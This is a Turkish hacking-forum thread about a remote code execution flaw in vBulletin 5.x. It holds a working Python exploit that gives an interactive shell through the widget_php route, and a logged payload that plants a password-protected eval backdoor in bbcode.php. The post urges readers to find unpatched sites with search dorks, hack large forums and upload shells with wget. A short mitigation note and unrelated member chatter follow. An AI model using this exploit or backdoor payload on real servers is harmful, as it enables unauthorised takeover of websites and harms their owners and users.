Neler yeni

Zero-Day RCE in vBulletin v5.0.0-v5.5.4 (1 Viewer)

MecTruy 

Yaşlı Kurt
1111xx
Mesajlar
1,463
Credits
29,239
Security Risk: Critical
Exploitation Level:
Very Easy
DREAD Score: 9.4
Vulnerability: Remote Code Execution (RCE)
Patched Version: 5.5.2, 5.5.3, and 5.5.4

cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.5.3:
cpe:/a:vbulletin:vbulletin:5.5.2:
cpe:/a:vbulletin:vbulletin:5.5.1:
cpe:/a:vbulletin:vbulletin:5.5.0:
cpe:/a:vbulletin:vbulletin:5.5.4:
cpe:/a:vbulletin:vbulletin:5.4.5:
cpe:/a:vbulletin:vbulletin:5.4.4:
cpe:/a:vbulletin:vbulletin:5.4.3:
cpe:/a:vbulletin:vbulletin:5.4.2:
cpe:/a:vbulletin:vbulletin:5.4.1:
cpe:/a:vbulletin:vbulletin:5.4.0:
cpe:/a:vbulletin:vbulletin:5.3.4:
cpe:/a:vbulletin:vbulletin:5.3.3:
cpe:/a:vbulletin:vbulletin:5.3.2:
cpe:/a:vbulletin:vbulletin:5.3.1:
cpe:/a:vbulletin:vbulletin:5.3.0:
cpe:/a:vbulletin:vbulletin:5.2.6:
cpe:/a:vbulletin:vbulletin:5.2.5:
cpe:/a:vbulletin:vbulletin:5.2.4:
cpe:/a:vbulletin:vbulletin:5.2.3:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_2:
cpe:/a:vbulletin:vbulletin:5.2.2_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.1_patch_level_1:
cpe:/a:vbulletin:vbulletin:5.2.0_patch_level_3:
cpe:/a:vbulletin:vbulletin:5.2.2:
cpe:/a:vbulletin:vbulletin:5.2.1:
cpe:/a:vbulletin:vbulletin:5.2.0:
cpe:/a:vbulletin:vbulletin:5.1.8:
cpe:/a:vbulletin:vbulletin:5.1.7:
cpe:/a:vbulletin:vbulletin:5.1.6:
cpe:/a:vbulletin:vbulletin:5.1.5:
cpe:/a:vbulletin:vbulletin:5.1.4:
cpe:/a:vbulletin:vbulletin:5.1.3:
cpe:/a:vbulletin:vbulletin:5.1.2:
cpe:/a:vbulletin:vbulletin:5.1.1:
cpe:/a:vbulletin:vbulletin:5.1.0:
cpe:/a:vbulletin:vbulletin:5.0.5:
cpe:/a:vbulletin:vbulletin:5.0.4:
cpe:/a:vbulletin:vbulletin:5.0.3:
cpe:/a:vbulletin:vbulletin:5.0.2:
cpe:/a:vbulletin:vbulletin:5.0.1:
cpe:/a:vbulletin:vbulletin:5.0:

Kullandığı payload
Kod:
202.141.232.162 - widgetConfig%5Bcode%5D=echo+shell_exec%28%27sed+-i+%5C%27s%2Feval%28%5C%24code%29%3B%2Fif+%28isset%28%5C%24_REQUEST%5B%5C%22epass%5C%22%5D%29+%5C%26%5C%26+%5C%24_REQUEST%5B%5C%22epass%5C%22%5D+%3D%3D+%5C%222dmfrb28nu3c6s9j%5C%22%29+%7B+eval%28%5C%24code%29%3B+%7D%2Fg%5C%27+includes%2Fvb5%2Ffrontend%2Fcontroller%2Fbbcode.php+%26%26+echo+-n+exploited+%7C+md5sum%27%29%3B+exit%3B [25/Sep/2019:18:01:16 +0000] "POST /index.php?routestring=ajax/render/widget_php HTTP/1.1" 200 5407 "-"

Vbulletinde kritik bir exploit olduğu ortaya çıktı, benimde haberim yoktu @Joker dün yazdı bir bak ne buldum dedi troll: bizde baktık birlikte hakkaten ilginç bir açık vermiş vbulletin, xenforada böyle bir açık çıktığını düşünmek bile sıkıcı bir durum olurdu. Dork konusunda iyi olanlar muhtemelen daha fix olmamış birçok site bulacaktır, hatta belki büyük forumları bile hackleyebileceksiniz.

Herhangi bir linux terminalden şu komutu çalıştırın

Python:
python vb.py http://hedefsite.com/forum

ardından ls komutunu çalıştırın gelen ekranda, eğer sitenin dosyaları alt alta listelenmişse açık vardır ve komutlar ile shell upload edin wget vs gibi.
EXPLOIT ektedir .txt olarak iner ancak uzantısını .py yapmanız gerekir.

açığa neden olan dosya:
index.php?routestring=ajax/render/widget_php
açığa neden olan dosyadaki ilgili bölüm

HTML:
<div class="widget-content">
            <vb:if condition="!empty($widgetConfig['code']) AND
!$vboptions['disable_php_rendering']">
                    {vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}}
                    {vb:raw $evaledPHP}
            <vb:else />
                    <vb:if condition="$user['can_use_sitebuilder']">
                            <span class="note">{vb:phrase click_edit_to_config_module}</span>
                    </vb:if>
            </vb:if>
    </div>

Açığı nasıl kapatırım ?
Bu sorunu geçici olarak çözmek için yönetim panelinizden şuraya gidin:
Admincp >> Seçenekler >> Genel Ayarlar
Buradan, PHP'yi, Statik HTML'yi ve Reklam Modülü oluşturma ayarını devre dışı bırakın.
Vbulletin bunun için bir patch yayınladı hatalı kodlar için. Yukardaki çözüm şuanlık işinizi görür.
 

Ekli dosyalar

  • vb.txt
    651 bayt · Görüntüleme: 28
Son düzenleme:

MecTruy 

Yaşlı Kurt
1111xx
Mesajlar
1,463
Credits
29,239
teşekkürler ama dosyayı indiremiyorum yeni üye olduğum için mi ?

buyur

Python:
#!/usr/bin/python

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed!")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))
 
Mesajlar
3
Credits
0
Security Risk: Critical
Exploitation Level:
Very Easy
DREAD Score: 9.4
Vulnerability: Remote Code Execution (RCE)
Patched Version: 5.5.2, 5.5.3, and 5.5.4

Kanka ben RemotE üye oldum sitene tekrar ama şifremi unuttum, emaile şifre istiyorum gelmiyor niye ? sorun mu var mail serverinda bi halledermisin ona göre kendi nickime geçeyim.
 
Mesajlar
15
Credits
0
u54554211

fxbees

umrgaiba


kıymetini bilin fazla vermem he :D fena bi link paneli yaptım yakında satışa koyarım :D
 
X

x

basimiz-belaya-girecek_1631715.jpg
 

Bu konuyu görüntüleyen kullanıcılar